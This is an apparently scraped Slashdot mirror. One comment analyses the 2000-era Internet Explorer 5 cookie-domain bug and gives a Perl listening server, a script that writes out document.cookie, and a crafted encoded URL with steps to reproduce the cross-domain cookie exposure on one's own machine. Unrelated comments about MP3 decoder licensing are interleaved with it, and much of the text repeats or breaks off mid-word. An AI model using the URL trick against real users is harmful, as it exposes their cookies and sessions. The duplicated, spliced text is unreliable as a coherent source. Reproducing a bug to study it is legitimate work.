The bug is only in the client-side javascript (i.e. your other-site cookies AREN'T sent to this site). Consider this bit of perl code:
#!/usr/bin/perl -w
use strict;
use IO::Socket::INET;
my $socket = IO::Socket::INET->new(Listen => 30, LocalPort => 80, Proto => 'tcp');
$| = 1; $socket->listen(); my $newsock = undef; while ($newsock = $socket->accept()) { my $getNext = 1; my $line = ''; while ($getNext && ($line = $newsock->getline())) { print $line; chomp $line; if (length $line < 2) { $getNext = 0; } } print "***done****\n"; my $foo = <<EOS; HTTP/1.1 200 OK Date: Thu, 11 May 2000 19:33:11 GMT Server: Apache/1.3.0 (Unix) Last-Modified: Thu, 11 May 2000 04:19:57 GMT ETag: "23a5f-82-391a34ed" Accept-Ranges: bytes Content-Length: 130 Connection: close Content-Type: text/html
The value of your cookie for the domain you entered is:<br> <script> document.write('<b>' + document.cookie + '</b>'); </script> EOS $newsock->print($foo); }
I lifted the response by telnetting to www.peacefire.org and issuing a:
Follow these steps to see that your cookies aren't being sent: * turn on cookies in your ie5 browser * pick two sites that issue cookies and visit those sites to make sure the cookies are set * run the above perl script (as root, its on port 80) on your favourite box * set up a hosts file on your windows box for www.firstsiteyoupicked.com to point to the box your running the perl script on * go to http://www.firstsiteyoupicked.com%2ffoo.html%3F.se condsiteyoupicked.com/ * you'll note that IE dutifuly sent the cookies from firstsiteyoupicked.com to the web server (see output of the perl script) * you'll also note that in your IE5 window the cookies for secondsiteyoupicked.com show up.
So, I think this shows that it is a client-side only bug (but a bug nonetheless).
Unfortunately, mpg123 is not GPL, so we can't use it (and, we believe splay (which is GPL) is based too heavily on amp (which means if we use it in our software it could leave us open to a lawsuit from the people who now own amp).
As far as working on the speed of the decoder, we have someone doing that. Unfortunately, writing hand optimized assembly is not something that happens overnight. I personally would rather work on other stuff while this other guy we have works on the optimization.
I am personally interested in seeing what engine X11amp uses whenever they release.
Slashdot Mirror
The bug is only in the client-side javascript (i.e. your other-site cookies AREN'T sent to this site). Consider this bit of perl code:
/security/iecookies/showcookie.html?.foo.com/ HTTP/1.0
e condsiteyoupicked.com/
#!/usr/bin/perl -w
use strict;
use IO::Socket::INET;
my $socket = IO::Socket::INET->new(Listen => 30, LocalPort => 80, Proto => 'tcp');
$| = 1;
$socket->listen();
my $newsock = undef;
while ($newsock = $socket->accept()) {
my $getNext = 1;
my $line = '';
while ($getNext && ($line = $newsock->getline())) {
print $line;
chomp $line;
if (length $line < 2) {
$getNext = 0;
}
}
print "***done****\n";
my $foo = <<EOS;
HTTP/1.1 200 OK
Date: Thu, 11 May 2000 19:33:11 GMT
Server: Apache/1.3.0 (Unix)
Last-Modified: Thu, 11 May 2000 04:19:57 GMT
ETag: "23a5f-82-391a34ed"
Accept-Ranges: bytes
Content-Length: 130
Connection: close
Content-Type: text/html
The value of your cookie for the domain you entered is:<br>
<script>
document.write('<b>' + document.cookie + '</b>');
</script>
EOS
$newsock->print($foo);
}
I lifted the response by telnetting to www.peacefire.org and issuing a:
GET
Follow these steps to see that your cookies aren't being sent:
* turn on cookies in your ie5 browser
* pick two sites that issue cookies and visit those sites to make sure the cookies are set
* run the above perl script (as root, its on port 80) on your favourite box
* set up a hosts file on your windows box for www.firstsiteyoupicked.com to point to the box your running the perl script on
* go to http://www.firstsiteyoupicked.com%2ffoo.html%3F.s
* you'll note that IE dutifuly sent the cookies from firstsiteyoupicked.com to the web server (see output of the perl script)
* you'll also note that in your IE5 window the cookies for secondsiteyoupicked.com show up.
So, I think this shows that it is a client-side only bug (but a bug nonetheless).
As far as working on the speed of the decoder, we have someone doing that. Unfortunately, writing hand optimized assembly is not something that happens overnight. I personally would rather work on other stuff while this other guy we have works on the optimization.
I am personally interested in seeing what engine X11amp uses whenever they release.